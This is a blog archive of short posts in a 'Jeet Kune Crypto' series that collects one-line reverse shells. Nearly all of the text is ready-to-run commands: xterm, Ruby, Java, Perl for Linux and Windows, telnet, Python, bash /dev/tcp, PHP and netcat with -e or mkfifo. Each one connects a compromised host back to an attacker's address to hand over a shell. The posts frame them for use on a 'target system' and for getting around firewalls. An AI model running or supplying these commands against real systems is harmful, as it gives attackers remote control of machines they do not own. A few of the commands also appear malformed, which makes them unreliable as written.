Jeet Kune Crypto is kind of a play on “kung foo”. Kung foo was an old way to refer to skillfully written code. Jeet Kune Crypto is something I made up to refer to small bits of code or single line commands that are useful for network security.

One Liner Reverse Shells, Remote Desktop Edition

one line reverse shell xterm
one line reverse shell using xterm

 

So, it’s been a little while, since I shared some one line reverse shells with you guys. Here are a few “obscure” ones, if you ever find the need for them. I do not recommend bothering with the remote Xsessions. But, to each their own.

 

Xterm One Line Reverse Shell

 

You’ll need to listen on port 6001 using a tool like xnest, try xnest :1 and then:

 

xterm -display 10.0.0.1:1

 

Boom! Remote desktop.

 

Ruby Reverse Shell in One Line

 

Listen on port 1234, obviously.

 

ruby -rsocket -e'f=TCPSocket.open("172.16.16.169",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

 

Java One Line Reverse Shell

 

This one is cross-platform, as Java always tries to be. Listen on port 2002

 

r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/172.16.16.169/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) p.waitFor()

 

 

2020-07-07T02:09:47-04:00May 20th, 2020|Categories: Jeet Kune Crypto, One Liners|Tags: , , |

Jeet Kune Crypto: Powerful Perl Reverse Shells

Let’s spawn a few perl reverse shells, in various environments. Why? Because Perl is that diverse.

Perl Reverse Shells

If you’re just getting into writing code, python comes heavily recommended. But, if code auditing is something you’re wanting to get into, jumping straight into perl might be more beneficial. And, yes, these are all built to be executed on a single line.

A linux reverse shell using /bin/sh

perl -e 'use Socket; $i="172.16.16.5"; $p=1234; socket(S,PF_INET, SOCK_STREAM, getprotobyname("tcp")); if(connect(S,sockaddr_in($p,inet_aton($i)))){ open(STDIN,">&S");open(STDOUT,">&S"); open(STDERR, ">&S"); exec("/bin/sh -i");};'
perl reverse shell connecting back to ncat
perl reverse shell connecting back
ncat listening for the perl reverse shell to connect
ncat listening and accepting

A Windows reverse shell using Perl

It’s actually not uncommon to find perl installed on Windows Servers

perl -MIO -e '$c=new IO::Socket::INET(PeerAddr, "172.16.16.5:1234");STDIN->fdopen($c,r);$~->fdopen($c,w);$_ while<>;'

Perl reverse shell without using /bin/sh

Perl is so versatile that we can do some amazing things with it. Watch us spawn a reverse shell without using a binary!

perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr, "172.16.16.5:1234");STDIN->fdopen($c,r);$~->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

Feel free to comment, if you’ve got some more reverse shells. We do have moderation enabled, but we’re pretty lenient with the content here, at Gray Hat Freelancing.

2020-07-01T16:32:02-04:00April 6th, 2020|Categories: Jeet Kune Crypto, One Liners|Tags: , , |

Jeet Kune Crypto: Telnet Reverse Shells are Devastating

Reverse shells communicate in plaintext, by default. Telnet isn’t often installed by default any more. But, if it does exist on your target system, here are two one liners you can use to spawn a reverse shell with telnet.

Telnet Reverse Shells are Easy

rm -rf /tmp/p; mknod /tmp/p p && telnet 172.16.16.1 1234 0/tmp/p
telnet reverse shells
ugh… telnet

Another Simple Telnet Connect-Back Shell

telnet 172.16.16.1 1234 | /bin/bash | telnet 172.16.16.1 1235

As usual, in these reverse shell scenarios, your IP is 172.16.16.1 and your port is 1234. Telnet should be piped through an encrypted tunnel, unless you don’t mind people snooping on you.

2020-04-06T10:06:28-04:00April 6th, 2020|Categories: Jeet Kune Crypto, One Liners|Tags: , |

More One Line Reverse Shells

Jeet Kune Crypto: One Line Reverse Shells with Scripting Languages

Reverse shells are extremely useful for subverting firewalls or other security mechanisms that may block new opened ports. Often you’ll find hosts already have several scripting languages installed. We’re going to take advantage of the some of the most popular of those languages, to spawn a reverse shell.

In these scenarios, your listening IP is 172.16.16.1 and your listening port is 1234.

Python Reverse Shell:

This python one line reverse shell is kind of a trip. Trust me, nobody expects you to remember this one, off of the top of your head.

python -c 'import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("172.16.16.1",1234)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]);'

BASH Reverse Shell:

This one is simple. Everyone expects you to remember something like this, off of the top of your head.

bash -i >& /dev/tcp/172.16.16.1/1234 0>&1

PHP Reverse Shell:

From terminal:

php -r '$sock=fsockopen("172.16.16.1",1234);exec("/bin/sh" -i <&3 >&3 2>&3");'

2020-04-06T09:18:19-04:00April 6th, 2020|Categories: Jeet Kune Crypto, One Liners|Tags: |

Jeet Kune Crypto: netcat (reverse shells)

Jeet Kune Crypto: netcat (reverse shells)

One of the most useful TCP/IP tools, for network and systems engineers, is netcat. Netcat is commonly referred to as the “TCP/IP Swiss Army Knife”. It is often flagged as malware or a “potentially unwanted program” by anti-malware software.

While traditional backdoors wait for you to connect (which netcat can also do). Here are a few ways that you can use it as a “reverse shell”, or a backdoor that connects back to you:

Versions that support "-e":
Linux:
nc -e "/bin/sh" <target> <target port>
Windows:
nc -e "cmd.exe" <target> <target port>

If the version of netcat that you’re using does not support “-e”, you’ll want to create a network socket out of a file. You can “hack” up a network socket on linux, like so:

mkfifo /tmp/socket;cat /tmp/socket|/bin/sh -i 2>&1|nc <target> <target port> > /tmp/socket

If you’re using netcat to listen for the incoming connection, you’d prepare to receive this type of connection like so:

nc <host> <port>
or for a range of ports
nc <host> <starting port>-<ending port>
2020-06-19T12:24:43-04:00April 5th, 2020|Categories: Jeet Kune Crypto, One Liners|Tags: , |